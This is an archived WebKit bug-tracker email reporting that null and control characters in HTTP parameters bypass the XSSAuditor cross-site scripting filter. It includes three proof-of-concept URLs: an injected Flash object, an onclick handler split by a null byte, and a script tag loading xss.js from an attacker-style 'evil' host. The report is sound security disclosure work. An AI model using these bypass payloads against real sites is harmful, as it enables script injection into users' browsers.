[Webkit-unassigned] [Bug 27071] New: [XSSAuditor] HTTP parameters with null/control characters bypass XSSAuditor
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Tue Jul 7 23:54:54 PDT 2009
https://bugs.webkit.org/show_bug.cgi?id=27071
Summary: [XSSAuditor] HTTP parameters with null/control
characters bypass XSSAuditor
Product: WebKit
Version: 528+ (Nightly build)
Platform: All
OS/Version: All
Status: UNCONFIRMED
Severity: Normal
Priority: P2
Component: WebCore Misc.
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: dbates at berkeley.edu
CC: sam at webkit.org, abarth at webkit.org, dbates at berkeley.edu
Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to injected plugin-based objects, inline event handlers, and external
scripts.
Examples:
Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E
Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E
External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script
src='http://evil.webblaze.org/dbates/xss.js'></script>
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
More information about the webkit-unassigned
mailing list